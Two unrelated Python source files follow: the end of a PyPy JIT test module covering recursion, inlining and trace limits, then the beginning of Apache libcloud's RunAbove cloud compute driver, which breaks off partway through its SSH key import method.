if n > 0:
myjitdriver.can_enter_jit(n=n, code=code, pc=0)
pc = 0
continue
else:
assert 0
pc += 1
return n
def main(n):
return f("c-l", n)
res = self.meta_interp(main, [100], enable_opts='', inline=True)
assert res == main(100)
def test_recurse_during_blackholing(self):
# this passes, if the blackholing shortcut for calls is turned off
# it fails, it is very delicate in terms of parameters,
# bridge/loop creation order
def p(pc, code):
code = hlstr(code)
return "%s %d %s" % (code, pc, code[pc])
myjitdriver = JitDriver(greens=['pc', 'code'], reds=['n'],
get_printable_location=p)
def f(code, n):
pc = 0
while pc < len(code):
myjitdriver.jit_merge_point(n=n, code=code, pc=pc)
op = code[pc]
if op == "-":
n -= 1
elif op == "c":
if n < 70 and n % 3 == 1:
n = f("--", n)
elif op == "l":
if n > 0:
myjitdriver.can_enter_jit(n=n, code=code, pc=0)
pc = 0
continue
else:
assert 0
pc += 1
return n
def main(n):
set_param(None, 'threshold', 3)
set_param(None, 'trace_eagerness', 5)
return f("c-l", n)
expected = main(100)
res = self.meta_interp(main, [100], enable_opts='', inline=True)
assert res == expected
def check_max_trace_length(self, length):
for loop in get_stats().loops:
assert len(loop.operations) <= length + 5 # because we only check once per metainterp bytecode
for op in loop.operations:
if op.is_guard() and hasattr(op.getdescr(), '_debug_suboperations'):
assert len(op.getdescr()._debug_suboperations) <= length + 5
def test_inline_trace_limit(self):
myjitdriver = JitDriver(greens=[], reds=['n'])
def recursive(n):
if n > 0:
return recursive(n - 1) + 1
return 0
def loop(n):
set_param(myjitdriver, "threshold", 10)
pc = 0
while n:
myjitdriver.can_enter_jit(n=n)
myjitdriver.jit_merge_point(n=n)
n = recursive(n)
n -= 1
return n
TRACE_LIMIT = 66
res = self.meta_interp(loop, [100], enable_opts='', inline=True, trace_limit=TRACE_LIMIT)
assert res == 0
self.check_max_trace_length(TRACE_LIMIT)
self.check_enter_count_at_most(10) # maybe
self.check_aborted_count(6)
def test_trace_limit_bridge(self):
def recursive(n):
if n > 0:
return recursive(n - 1) + 1
return 0
myjitdriver = JitDriver(greens=[], reds=['n'])
def loop(n):
set_param(None, "threshold", 4)
set_param(None, "trace_eagerness", 2)
while n:
myjitdriver.can_enter_jit(n=n)
myjitdriver.jit_merge_point(n=n)
if n % 5 == 0:
n -= 1
if n < 50:
n = recursive(n)
n -= 1
return n
TRACE_LIMIT = 20
res = self.meta_interp(loop, [100], enable_opts='', inline=True, trace_limit=TRACE_LIMIT)
self.check_max_trace_length(TRACE_LIMIT)
self.check_aborted_count(8)
self.check_enter_count_at_most(30)
def test_trace_limit_with_exception_bug(self):
myjitdriver = JitDriver(greens=[], reds=['n'])
@unroll_safe
def do_stuff(n):
while n > 0:
n -= 1
raise ValueError
def loop(n):
pc = 0
while n > 80:
myjitdriver.can_enter_jit(n=n)
myjitdriver.jit_merge_point(n=n)
try:
do_stuff(n)
except ValueError:
# the trace limit is checked when we arrive here, and we
# have the exception still in last_exc_value_box at this
# point -- so when we abort because of a trace too long,
# the exception is passed to the blackhole interp and
# incorrectly re-raised from here
pass
n -= 1
return n
TRACE_LIMIT = 66
res = self.meta_interp(loop, [100], trace_limit=TRACE_LIMIT)
assert res == 80
def test_max_failure_args(self):
FAILARGS_LIMIT = 10
jitdriver = JitDriver(greens = [], reds = ['i', 'n', 'o'])
class A(object):
def __init__(self, i0, i1, i2, i3, i4, i5, i6, i7, i8, i9):
self.i0 = i0
self.i1 = i1
self.i2 = i2
self.i3 = i3
self.i4 = i4
self.i5 = i5
self.i6 = i6
self.i7 = i7
self.i8 = i8
self.i9 = i9
def loop(n):
i = 0
o = A(0, 1, 2, 3, 4, 5, 6, 7, 8, 9)
while i < n:
jitdriver.can_enter_jit(o=o, i=i, n=n)
jitdriver.jit_merge_point(o=o, i=i, n=n)
o = A(i, i + 1, i + 2, i + 3, i + 4, i + 5,
i + 6, i + 7, i + 8, i + 9)
i += 1
return o
res = self.meta_interp(loop, [20], failargs_limit=FAILARGS_LIMIT,
listops=True)
self.check_aborted_count(4)
def test_max_failure_args_exc(self):
FAILARGS_LIMIT = 10
jitdriver = JitDriver(greens = [], reds = ['i', 'n', 'o'])
class A(object):
def __init__(self, i0, i1, i2, i3, i4, i5, i6, i7, i8, i9):
self.i0 = i0
self.i1 = i1
self.i2 = i2
self.i3 = i3
self.i4 = i4
self.i5 = i5
self.i6 = i6
self.i7 = i7
self.i8 = i8
self.i9 = i9
def loop(n):
i = 0
o = A(0, 1, 2, 3, 4, 5, 6, 7, 8, 9)
while i < n:
jitdriver.can_enter_jit(o=o, i=i, n=n)
jitdriver.jit_merge_point(o=o, i=i, n=n)
o = A(i, i + 1, i + 2, i + 3, i + 4, i + 5,
i + 6, i + 7, i + 8, i + 9)
i += 1
raise ValueError
def main(n):
try:
loop(n)
return 1
except ValueError:
return 0
res = self.meta_interp(main, [20], failargs_limit=FAILARGS_LIMIT,
listops=True)
assert not res
self.check_aborted_count(4)
def test_set_param_inlining(self):
myjitdriver = JitDriver(greens=[], reds=['n', 'recurse'])
def loop(n, recurse=False):
while n:
myjitdriver.jit_merge_point(n=n, recurse=recurse)
n -= 1
if not recurse:
loop(10, True)
myjitdriver.can_enter_jit(n=n, recurse=recurse)
return n
TRACE_LIMIT = 66
def main(inline):
set_param(None, "threshold", 10)
set_param(None, 'function_threshold', 60)
if inline:
set_param(None, 'inlining', True)
else:
set_param(None, 'inlining', False)
return loop(100)
res = self.meta_interp(main, [0], enable_opts='', trace_limit=TRACE_LIMIT)
self.check_resops(call=0, call_may_force_i=1)
res = self.meta_interp(main, [1], enable_opts='', trace_limit=TRACE_LIMIT)
self.check_resops(call=0, call_may_force=0)
def test_trace_from_start(self):
def p(pc, code):
code = hlstr(code)
return "'%s' at %d: %s" % (code, pc, code[pc])
myjitdriver = JitDriver(greens=['pc', 'code'], reds=['n'],
get_printable_location=p)
def f(code, n):
pc = 0
while pc < len(code):
myjitdriver.jit_merge_point(n=n, code=code, pc=pc)
op = code[pc]
if op == "+":
n += 7
elif op == "-":
n -= 1
elif op == "c":
n = f('---', n)
elif op == "l":
if n > 0:
myjitdriver.can_enter_jit(n=n, code=code, pc=1)
pc = 1
continue
else:
assert 0
pc += 1
return n
def g(m):
if m > 1000000:
f('', 0)
result = 0
for i in range(m):
result += f('+-cl--', i)
res = self.meta_interp(g, [50], backendopt=True)
assert res == g(50)
py.test.skip("tracing from start is by now only longer enabled "
"if a trace gets too big")
self.check_tree_loop_count(3)
self.check_history(int_add=1)
def test_dont_inline_huge_stuff(self):
def p(pc, code):
code = hlstr(code)
return "%s %d %s" % (code, pc, code[pc])
myjitdriver = JitDriver(greens=['pc', 'code'], reds=['n'],
get_printable_location=p)
def f(code, n):
pc = 0
while pc < len(code):
myjitdriver.jit_merge_point(n=n, code=code, pc=pc)
op = code[pc]
if op == "-":
n -= 1
elif op == "c":
f('--------------------', n)
elif op == "l":
if n > 0:
myjitdriver.can_enter_jit(n=n, code=code, pc=0)
pc = 0
continue
else:
assert 0
pc += 1
return n
def g(m):
set_param(None, 'inlining', True)
# carefully chosen threshold to make sure that the inner function
# cannot be inlined, but the inner function on its own is small
# enough
set_param(None, 'trace_limit', 40)
if m > 1000000:
f('', 0)
result = 0
for i in range(m):
result += f('-c-----------l-', i+100)
self.meta_interp(g, [10], backendopt=True)
self.check_aborted_count(1)
self.check_resops(call=0, call_assembler_i=2)
self.check_jitcell_token_count(2)
def test_directly_call_assembler(self):
driver = JitDriver(greens = ['codeno'], reds = ['i'],
get_printable_location = lambda codeno : str(codeno))
def portal(codeno):
i = 0
while i < 10:
driver.can_enter_jit(codeno = codeno, i = i)
driver.jit_merge_point(codeno = codeno, i = i)
if codeno == 2:
portal(1)
i += 1
self.meta_interp(portal, [2], inline=True)
self.check_history(call_assembler_n=1)
def test_recursion_cant_call_assembler_directly(self):
driver = JitDriver(greens = ['codeno'], reds = ['i', 'j'],
get_printable_location = lambda codeno : str(codeno))
def portal(codeno, j):
i = 1
while 1:
driver.jit_merge_point(codeno=codeno, i=i, j=j)
if (i >> 1) == 1:
if j == 0:
return
portal(2, j - 1)
elif i == 5:
return
i += 1
driver.can_enter_jit(codeno=codeno, i=i, j=j)
portal(2, 5)
from rpython.jit.metainterp import compile, pyjitpl
pyjitpl._warmrunnerdesc = None
trace = []
def my_ctc(*args):
looptoken = original_ctc(*args)
trace.append(looptoken)
return looptoken
original_ctc = compile.compile_tmp_callback
try:
compile.compile_tmp_callback = my_ctc
self.meta_interp(portal, [2, 5], inline=True)
self.check_resops(call_may_force=0, call_assembler_n=2)
finally:
compile.compile_tmp_callback = original_ctc
# check that we made a temporary callback
assert len(trace) == 1
# and that we later redirected it to something else
try:
redirected = pyjitpl._warmrunnerdesc.cpu._redirected_call_assembler
except AttributeError:
pass # not the llgraph backend
else:
print redirected
assert redirected.keys() == trace
def test_recursion_cant_call_assembler_directly_with_virtualizable(self):
# exactly the same logic as the previous test, but with 'frame.j'
# instead of just 'j'
class Frame(object):
_virtualizable_ = ['j']
def __init__(self, j):
self.j = j
driver = JitDriver(greens = ['codeno'], reds = ['i', 'frame'],
virtualizables = ['frame'],
get_printable_location = lambda codeno : str(codeno))
def portal(codeno, frame):
i = 1
while 1:
driver.jit_merge_point(codeno=codeno, i=i, frame=frame)
if (i >> 1) == 1:
if frame.j == 0:
return
portal(2, Frame(frame.j - 1))
elif i == 5:
return
i += 1
driver.can_enter_jit(codeno=codeno, i=i, frame=frame)
def main(codeno, j):
portal(codeno, Frame(j))
main(2, 5)
from rpython.jit.metainterp import compile, pyjitpl
pyjitpl._warmrunnerdesc = None
trace = []
def my_ctc(*args):
looptoken = original_ctc(*args)
trace.append(looptoken)
return looptoken
original_ctc = compile.compile_tmp_callback
try:
compile.compile_tmp_callback = my_ctc
self.meta_interp(main, [2, 5], inline=True)
self.check_resops(call_may_force=0, call_assembler_n=2)
finally:
compile.compile_tmp_callback = original_ctc
# check that we made a temporary callback
assert len(trace) == 1
# and that we later redirected it to something else
try:
redirected = pyjitpl._warmrunnerdesc.cpu._redirected_call_assembler
except AttributeError:
pass # not the llgraph backend
else:
print redirected
assert redirected.keys() == trace
def test_directly_call_assembler_return(self):
driver = JitDriver(greens = ['codeno'], reds = ['i', 'k'],
get_printable_location = lambda codeno : str(codeno))
def portal(codeno):
i = 0
k = codeno
while i < 10:
driver.can_enter_jit(codeno = codeno, i = i, k = k)
driver.jit_merge_point(codeno = codeno, i = i, k = k)
if codeno == 2:
k = portal(1)
i += 1
return k
self.meta_interp(portal, [2], inline=True)
self.check_history(call_assembler_i=1)
def test_directly_call_assembler_raise(self):
class MyException(Exception):
def __init__(self, x):
self.x = x
driver = JitDriver(greens = ['codeno'], reds = ['i'],
get_printable_location = lambda codeno : str(codeno))
def portal(codeno):
i = 0
while i < 10:
driver.can_enter_jit(codeno = codeno, i = i)
driver.jit_merge_point(codeno = codeno, i = i)
if codeno == 2:
try:
portal(1)
except MyException, me:
i += me.x
i += 1
if codeno == 1:
raise MyException(1)
self.meta_interp(portal, [2], inline=True)
self.check_history(call_assembler_n=1)
def test_directly_call_assembler_fail_guard(self):
driver = JitDriver(greens = ['codeno'], reds = ['i', 'k'],
get_printable_location = lambda codeno : str(codeno))
def portal(codeno, k):
i = 0
while i < 10:
driver.can_enter_jit(codeno=codeno, i=i, k=k)
driver.jit_merge_point(codeno=codeno, i=i, k=k)
if codeno == 2:
k += portal(1, k)
elif k > 40:
if i % 2:
k += 1
else:
k += 2
k += 1
i += 1
return k
res = self.meta_interp(portal, [2, 0], inline=True)
assert res == 13542
def test_directly_call_assembler_virtualizable(self):
class Thing(object):
def __init__(self, val):
self.val = val
class Frame(object):
_virtualizable_ = ['thing']
driver = JitDriver(greens = ['codeno'], reds = ['i', 's', 'frame'],
virtualizables = ['frame'],
get_printable_location = lambda codeno : str(codeno))
def main(codeno):
frame = Frame()
frame.thing = Thing(0)
result = portal(codeno, frame)
return result
def portal(codeno, frame):
i = 0
s = 0
while i < 10:
driver.can_enter_jit(frame=frame, codeno=codeno, i=i, s=s)
driver.jit_merge_point(frame=frame, codeno=codeno, i=i, s=s)
nextval = frame.thing.val
if codeno == 0:
subframe = Frame()
subframe.thing = Thing(nextval)
nextval = portal(1, subframe)
s += subframe.thing.val
frame.thing = Thing(nextval + 1)
i += 1
return frame.thing.val + s
res = self.meta_interp(main, [0], inline=True)
self.check_resops(call=0, cond_call=2)
assert res == main(0)
def test_directly_call_assembler_virtualizable_reset_token(self):
py.test.skip("not applicable any more, I think")
from rpython.rtyper.lltypesystem import lltype
from rpython.rlib.debug import llinterpcall
class Thing(object):
def __init__(self, val):
self.val = val
class Frame(object):
_virtualizable_ = ['thing']
driver = JitDriver(greens = ['codeno'], reds = ['i', 'frame'],
virtualizables = ['frame'],
get_printable_location = lambda codeno : str(codeno))
@dont_look_inside
def check_frame(subframe):
if we_are_translated():
llinterpcall(lltype.Void, check_ll_frame, subframe)
def check_ll_frame(ll_subframe):
# This is called with the low-level Struct that is the frame.
# Check that the vable_token was correctly reset to zero.
# Note that in order for that test to catch failures, it needs
# three levels of recursion: the vable_token of the subframe
# at the level 2 is set to a non-zero value when doing the
# call to the level 3 only. This used to fail when the test
# is run via rpython.jit.backend.x86.test.test_recursive.
from rpython.jit.metainterp.virtualizable import TOKEN_NONE
assert ll_subframe.vable_token == TOKEN_NONE
def main(codeno):
frame = Frame()
frame.thing = Thing(0)
portal(codeno, frame)
return frame.thing.val
def portal(codeno, frame):
i = 0
while i < 5:
driver.can_enter_jit(frame=frame, codeno=codeno, i=i)
driver.jit_merge_point(frame=frame, codeno=codeno, i=i)
nextval = frame.thing.val
if codeno < 2:
subframe = Frame()
subframe.thing = Thing(nextval)
nextval = portal(codeno + 1, subframe)
check_frame(subframe)
frame.thing = Thing(nextval + 1)
i += 1
return frame.thing.val
res = self.meta_interp(main, [0], inline=True)
assert res == main(0)
def test_directly_call_assembler_virtualizable_force1(self):
class Thing(object):
def __init__(self, val):
self.val = val
class Frame(object):
_virtualizable_ = ['thing']
driver = JitDriver(greens = ['codeno'], reds = ['i', 'frame'],
virtualizables = ['frame'],
get_printable_location = lambda codeno : str(codeno))
class SomewhereElse(object):
pass
somewhere_else = SomewhereElse()
def change(newthing):
somewhere_else.frame.thing = newthing
def main(codeno):
frame = Frame()
somewhere_else.frame = frame
frame.thing = Thing(0)
portal(codeno, frame)
return frame.thing.val
def portal(codeno, frame):
print 'ENTER:', codeno, frame.thing.val
i = 0
while i < 10:
driver.can_enter_jit(frame=frame, codeno=codeno, i=i)
driver.jit_merge_point(frame=frame, codeno=codeno, i=i)
nextval = frame.thing.val
if codeno == 0:
subframe = Frame()
subframe.thing = Thing(nextval)
nextval = portal(1, subframe)
elif codeno == 1:
if frame.thing.val > 40:
change(Thing(13))
nextval = 13
else:
fatalerror("bad codeno = " + str(codeno))
frame.thing = Thing(nextval + 1)
i += 1
print 'LEAVE:', codeno, frame.thing.val
return frame.thing.val
res = self.meta_interp(main, [0], inline=True,
policy=StopAtXPolicy(change))
assert res == main(0)
def test_directly_call_assembler_virtualizable_with_array(self):
myjitdriver = JitDriver(greens = ['codeno'], reds = ['n', 'x', 'frame'],
virtualizables = ['frame'])
class Frame(object):
_virtualizable_ = ['l[*]', 's']
def __init__(self, l, s):
self = hint(self, access_directly=True,
fresh_virtualizable=True)
self.l = l
self.s = s
def main(codeno, n, a):
frame = Frame([a, a+1, a+2, a+3], 0)
return f(codeno, n, a, frame)
def f(codeno, n, a, frame):
x = 0
while n > 0:
myjitdriver.can_enter_jit(codeno=codeno, frame=frame, n=n, x=x)
myjitdriver.jit_merge_point(codeno=codeno, frame=frame, n=n,
x=x)
frame.s = promote(frame.s)
n -= 1
s = frame.s
assert s >= 0
x += frame.l[s]
frame.s += 1
if codeno == 0:
subframe = Frame([n, n+1, n+2, n+3], 0)
x += f(1, 10, 1, subframe)
s = frame.s
assert s >= 0
x += frame.l[s]
x += len(frame.l)
frame.s -= 1
return x
res = self.meta_interp(main, [0, 10, 1], listops=True, inline=True)
assert res == main(0, 10, 1)
def test_directly_call_assembler_virtualizable_force_blackhole(self):
class Thing(object):
def __init__(self, val):
self.val = val
class Frame(object):
_virtualizable_ = ['thing']
driver = JitDriver(greens = ['codeno'], reds = ['i', 'frame'],
virtualizables = ['frame'],
get_printable_location = lambda codeno : str(codeno))
class SomewhereElse(object):
pass
somewhere_else = SomewhereElse()
def change(newthing, arg):
print arg
if arg > 30:
somewhere_else.frame.thing = newthing
arg = 13
return arg
def main(codeno):
frame = Frame()
somewhere_else.frame = frame
frame.thing = Thing(0)
portal(codeno, frame)
return frame.thing.val
def portal(codeno, frame):
i = 0
while i < 10:
driver.can_enter_jit(frame=frame, codeno=codeno, i=i)
driver.jit_merge_point(frame=frame, codeno=codeno, i=i)
nextval = frame.thing.val
if codeno == 0:
subframe = Frame()
subframe.thing = Thing(nextval)
nextval = portal(1, subframe)
else:
nextval = change(Thing(13), frame.thing.val)
frame.thing = Thing(nextval + 1)
i += 1
return frame.thing.val
res = self.meta_interp(main, [0], inline=True,
policy=StopAtXPolicy(change))
assert res == main(0)
def test_assembler_call_red_args(self):
driver = JitDriver(greens = ['codeno'], reds = ['i', 'k'],
get_printable_location = lambda codeno : str(codeno))
def residual(k):
if k > 150:
return 0
return 1
def portal(codeno, k):
i = 0
while i < 15:
driver.can_enter_jit(codeno=codeno, i=i, k=k)
driver.jit_merge_point(codeno=codeno, i=i, k=k)
if codeno == 2:
k += portal(residual(k), k)
if codeno == 0:
k += 2
elif codeno == 1:
k += 1
i += 1
return k
res = self.meta_interp(portal, [2, 0], inline=True,
policy=StopAtXPolicy(residual))
assert res == portal(2, 0)
self.check_resops(call_assembler_i=4)
def test_inline_without_hitting_the_loop(self):
driver = JitDriver(greens = ['codeno'], reds = ['i'],
get_printable_location = lambda codeno : str(codeno))
def portal(codeno):
i = 0
while True:
driver.jit_merge_point(codeno=codeno, i=i)
if codeno < 10:
i += portal(20)
codeno += 1
elif codeno == 10:
if i > 63:
return i
codeno = 0
driver.can_enter_jit(codeno=codeno, i=i)
else:
return 1
assert portal(0) == 70
res = self.meta_interp(portal, [0], inline=True)
assert res == 70
self.check_resops(call_assembler=0)
def test_inline_with_hitting_the_loop_sometimes(self):
driver = JitDriver(greens = ['codeno'], reds = ['i', 'k'],
get_printable_location = lambda codeno : str(codeno))
def portal(codeno, k):
if k > 2:
return 1
i = 0
while True:
driver.jit_merge_point(codeno=codeno, i=i, k=k)
if codeno < 10:
i += portal(codeno + 5, k+1)
codeno += 1
elif codeno == 10:
if i > [-1, 2000, 63][k]:
return i
codeno = 0
driver.can_enter_jit(codeno=codeno, i=i, k=k)
else:
return 1
assert portal(0, 1) == 2095
res = self.meta_interp(portal, [0, 1], inline=True)
assert res == 2095
self.check_resops(call_assembler_i=12)
def test_inline_with_hitting_the_loop_sometimes_exc(self):
driver = JitDriver(greens = ['codeno'], reds = ['i', 'k'],
get_printable_location = lambda codeno : str(codeno))
class GotValue(Exception):
def __init__(self, result):
self.result = result
def portal(codeno, k):
if k > 2:
raise GotValue(1)
i = 0
while True:
driver.jit_merge_point(codeno=codeno, i=i, k=k)
if codeno < 10:
try:
portal(codeno + 5, k+1)
except GotValue, e:
i += e.result
codeno += 1
elif codeno == 10:
if i > [-1, 2000, 63][k]:
raise GotValue(i)
codeno = 0
driver.can_enter_jit(codeno=codeno, i=i, k=k)
else:
raise GotValue(1)
def main(codeno, k):
try:
portal(codeno, k)
except GotValue, e:
return e.result
assert main(0, 1) == 2095
res = self.meta_interp(main, [0, 1], inline=True)
assert res == 2095
self.check_resops(call_assembler_n=12)
def test_inline_recursion_limit(self):
driver = JitDriver(greens = ["threshold", "loop"], reds=["i"])
@dont_look_inside
def f():
set_param(driver, "max_unroll_recursion", 10)
def portal(threshold, loop, i):
f()
if i > threshold:
return i
while True:
driver.jit_merge_point(threshold=threshold, loop=loop, i=i)
if loop:
portal(threshold, False, 0)
else:
portal(threshold, False, i + 1)
return i
if i > 10:
return 1
i += 1
driver.can_enter_jit(threshold=threshold, loop=loop, i=i)
res1 = portal(10, True, 0)
res2 = self.meta_interp(portal, [10, True, 0], inline=True)
assert res1 == res2
self.check_resops(call_assembler_i=2)
res1 = portal(9, True, 0)
res2 = self.meta_interp(portal, [9, True, 0], inline=True)
assert res1 == res2
self.check_resops(call_assembler=0)
def test_handle_jitexception_in_portal(self):
# a test for _handle_jitexception_in_portal in blackhole.py
driver = JitDriver(greens = ['codeno'], reds = ['i', 'str'],
get_printable_location = lambda codeno: str(codeno))
def do_can_enter_jit(codeno, i, str):
i = (i+1)-1 # some operations
driver.can_enter_jit(codeno=codeno, i=i, str=str)
def intermediate(codeno, i, str):
if i == 9:
do_can_enter_jit(codeno, i, str)
def portal(codeno, str):
i = value.initial
while i < 10:
intermediate(codeno, i, str)
driver.jit_merge_point(codeno=codeno, i=i, str=str)
i += 1
if codeno == 64 and i == 10:
str = portal(96, str)
str += chr(codeno+i)
return str
class Value:
initial = -1
value = Value()
def main():
value.initial = 0
return (portal(64, '') +
portal(64, '') +
portal(64, '') +
portal(64, '') +
portal(64, ''))
assert main() == 'ABCDEFGHIabcdefghijJ' * 5
for tlimit in [95, 90, 102]:
print 'tlimit =', tlimit
res = self.meta_interp(main, [], inline=True, trace_limit=tlimit)
assert ''.join(res.chars) == 'ABCDEFGHIabcdefghijJ' * 5
def test_handle_jitexception_in_portal_returns_void(self):
# a test for _handle_jitexception_in_portal in blackhole.py
driver = JitDriver(greens = ['codeno'], reds = ['i', 'str'],
get_printable_location = lambda codeno: str(codeno))
def do_can_enter_jit(codeno, i, str):
i = (i+1)-1 # some operations
driver.can_enter_jit(codeno=codeno, i=i, str=str)
def intermediate(codeno, i, str):
if i == 9:
do_can_enter_jit(codeno, i, str)
def portal(codeno, str):
i = value.initial
while i < 10:
intermediate(codeno, i, str)
driver.jit_merge_point(codeno=codeno, i=i, str=str)
i += 1
if codeno == 64 and i == 10:
portal(96, str)
str += chr(codeno+i)
class Value:
initial = -1
value = Value()
def main():
value.initial = 0
portal(64, '')
portal(64, '')
portal(64, '')
portal(64, '')
portal(64, '')
main()
for tlimit in [95, 90, 102]:
print 'tlimit =', tlimit
self.meta_interp(main, [], inline=True, trace_limit=tlimit)
def test_no_duplicates_bug(self):
driver = JitDriver(greens = ['codeno'], reds = ['i'],
get_printable_location = lambda codeno: str(codeno))
def portal(codeno, i):
while i > 0:
driver.can_enter_jit(codeno=codeno, i=i)
driver.jit_merge_point(codeno=codeno, i=i)
if codeno > 0:
break
portal(i, i)
i -= 1
self.meta_interp(portal, [0, 10], inline=True)
def test_trace_from_start_always(self):
from rpython.rlib.nonconst import NonConstant
driver = JitDriver(greens = ['c'], reds = ['i', 'v'])
def portal(c, i, v):
while i > 0:
driver.jit_merge_point(c=c, i=i, v=v)
portal(c, i - 1, v)
if v:
driver.can_enter_jit(c=c, i=i, v=v)
break
def main(c, i, _set_param, v):
if _set_param:
set_param(driver, 'function_threshold', 0)
portal(c, i, v)
self.meta_interp(main, [10, 10, False, False], inline=True)
self.check_jitcell_token_count(1)
self.check_trace_count(1)
self.meta_interp(main, [3, 10, True, False], inline=True)
self.check_jitcell_token_count(0)
self.check_trace_count(0)
def test_trace_from_start_does_not_prevent_inlining(self):
driver = JitDriver(greens = ['c', 'bc'], reds = ['i'])
def portal(bc, c, i):
while True:
driver.jit_merge_point(c=c, bc=bc, i=i)
if bc == 0:
portal(1, 8, 0)
c += 1
else:
return
if c == 10: # bc == 0
c = 0
if i >= 100:
return
driver.can_enter_jit(c=c, bc=bc, i=i)
i += 1
self.meta_interp(portal, [0, 0, 0], inline=True)
self.check_resops(call_may_force=0, call=0)
def test_dont_repeatedly_trace_from_the_same_guard(self):
driver = JitDriver(greens = [], reds = ['level', 'i'])
def portal(level):
if level == 0:
i = -10
else:
i = 0
#
while True:
driver.jit_merge_point(level=level, i=i)
if level == 25:
return 42
i += 1
if i <= 0: # <- guard
continue # first make a loop
else:
# then we fail the guard above, doing a recursive call,
# which will itself fail the same guard above, and so on
return portal(level + 1)
self.meta_interp(portal, [0])
self.check_trace_count_at_most(2) # and not, e.g., 24
def test_get_unique_id(self):
lst = []
def reg_codemap(self, (start, size, l)):
lst.append((start, size))
old_reg_codemap(self, (start, size, l))
old_reg_codemap = codemap.CodemapStorage.register_codemap
try:
codemap.CodemapStorage.register_codemap = reg_codemap
def get_unique_id(pc, code):
return (code + 1) * 2
driver = JitDriver(greens=["pc", "code"], reds='auto',
get_unique_id=get_unique_id)
def f(pc, code):
i = 0
while i < 10:
driver.jit_merge_point(pc=pc, code=code)
pc += 1
if pc == 3:
if code == 1:
f(0, 0)
pc = 0
i += 1
self.meta_interp(f, [0, 1], inline=True)
self.check_get_unique_id(lst) # overloaded on assembler backends
finally:
codemap.CodemapStorage.register_codemap = old_reg_codemap
def check_get_unique_id(self, lst):
pass
class TestLLtype(RecursiveTests, LLJitMixin):
pass
|
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
RunAbove driver
"""
from libcloud.common.runabove import API_ROOT, RunAboveConnection
from libcloud.compute.base import NodeDriver, NodeSize, Node, NodeLocation
from libcloud.compute.base import NodeImage, StorageVolume
from libcloud.compute.types import Provider, StorageVolumeState
from libcloud.compute.drivers.openstack import OpenStackNodeDriver
from libcloud.compute.drivers.openstack import OpenStackKeyPair
class RunAboveNodeDriver(NodeDriver):
"""
Libcloud driver for the RunAbove API
For more information on the RunAbove API, read the official reference:
https://api.runabove.com/console/
"""
type = Provider.RUNABOVE
name = "RunAbove"
website = 'https://www.runabove.com/'
connectionCls = RunAboveConnection
features = {'create_node': ['ssh_key']}
api_name = 'runabove'
NODE_STATE_MAP = OpenStackNodeDriver.NODE_STATE_MAP
VOLUME_STATE_MAP = OpenStackNodeDriver.VOLUME_STATE_MAP
def __init__(self, key, secret, ex_consumer_key=None):
"""
Instantiate the driver with the given API credentials.
:param key: Your application key (required)
:type key: ``str``
:param secret: Your application secret (required)
:type secret: ``str``
:param ex_consumer_key: Your consumer key (required)
:type ex_consumer_key: ``str``
:rtype: ``None``
"""
self.datacenter = None
self.consumer_key = ex_consumer_key
NodeDriver.__init__(self, key, secret, ex_consumer_key=ex_consumer_key)
def list_nodes(self, location=None):
"""
List all nodes.
:keyword location: Location (region) used as filter
:type location: :class:`NodeLocation`
:return: List of node objects
:rtype: ``list`` of :class:`Node`
"""
action = API_ROOT + '/instance'
data = {}
if location:
data['region'] = location.id
response = self.connection.request(action, data=data)
return self._to_nodes(response.object)
def ex_get_node(self, node_id):
"""
Get a individual node.
:keyword node_id: Node's ID
:type node_id: ``str``
:return: Created node
:rtype : :class:`Node`
"""
action = API_ROOT + '/instance/' + node_id
response = self.connection.request(action, method='GET')
return self._to_node(response.object)
def create_node(self, name, image, size, location, ex_keyname=None):
"""
Create a new node
:keyword name: Name of created node
:type name: ``str``
:keyword image: Image used for node
:type image: :class:`NodeImage`
:keyword size: Size (flavor) used for node
:type size: :class:`NodeSize`
:keyword location: Location (region) where to create node
:type location: :class:`NodeLocation`
:keyword ex_keyname: Name of SSH key used
:type ex_keyname: ``str``
:return: Created node
:rtype : :class:`Node`
"""
action = API_ROOT + '/instance'
data = {
'name': name,
'imageId': image.id,
'flavorId': size.id,
'region': location.id,
}
if ex_keyname:
data['sshKeyName'] = ex_keyname
response = self.connection.request(action, data=data, method='POST')
return self._to_node(response.object)
def destroy_node(self, node):
action = API_ROOT + '/instance/' + node.id
self.connection.request(action, method='DELETE')
return True
def list_sizes(self, location=None):
action = API_ROOT + '/flavor'
data = {}
if location:
data['region'] = location.id
response = self.connection.request(action, data=data)
return self._to_sizes(response.object)
def ex_get_size(self, size_id):
"""
Get an individual size (flavor).
:keyword size_id: Size's ID
:type size_id: ``str``
:return: Size
:rtype: :class:`NodeSize`
"""
action = API_ROOT + '/flavor/' + size_id
response = self.connection.request(action)
return self._to_size(response.object)
def list_images(self, location=None, ex_size=None):
"""
List available images
:keyword location: Location (region) used as filter
:type location: :class:`NodeLocation`
:keyword ex_size: Exclude images which are uncompatible with given size
:type ex_size: :class:`NodeImage`
:return: List of images
:rtype : ``list`` of :class:`NodeImage`
"""
action = API_ROOT + '/image'
data = {}
if location:
data['region'] = location.id
if ex_size:
data['flavorId'] = ex_size.id
response = self.connection.request(action, data=data)
return self._to_images(response.object)
def get_image(self, image_id):
action = API_ROOT + '/image/' + image_id
response = self.connection.request(action)
return self._to_image(response.object)
def list_locations(self):
action = API_ROOT + '/region'
data = self.connection.request(action)
return self._to_locations(data.object)
def list_key_pairs(self, location=None):
"""
List available SSH public keys.
:keyword location: Location (region) used as filter
:type location: :class:`NodeLocation`
:return: Public keys
:rtype: ``list``of :class:`KeyPair`
"""
action = API_ROOT + '/ssh'
data = {}
if location:
data['region'] = location.id
response = self.connection.request(action, data=data)
return self._to_key_pairs(response.object)
def get_key_pair(self, name, location):
"""
Get an individual SSH public key by its name and location.
:keyword name: SSH key name
:type name: str
:keyword location: Key's region
:type location: :class:`NodeLocation`
:return: Public key
:rtype: :class:`KeyPair`
"""
action = API_ROOT + '/ssh/' + name
data = {'region': location.id}
response = self.connection.request(action, data=data)
return self._to_key_pair(response.object)
def import_key_pair_from_string(self, name, key_material, location):
"""
Import a new public key from string.
:param name: Key pair name.
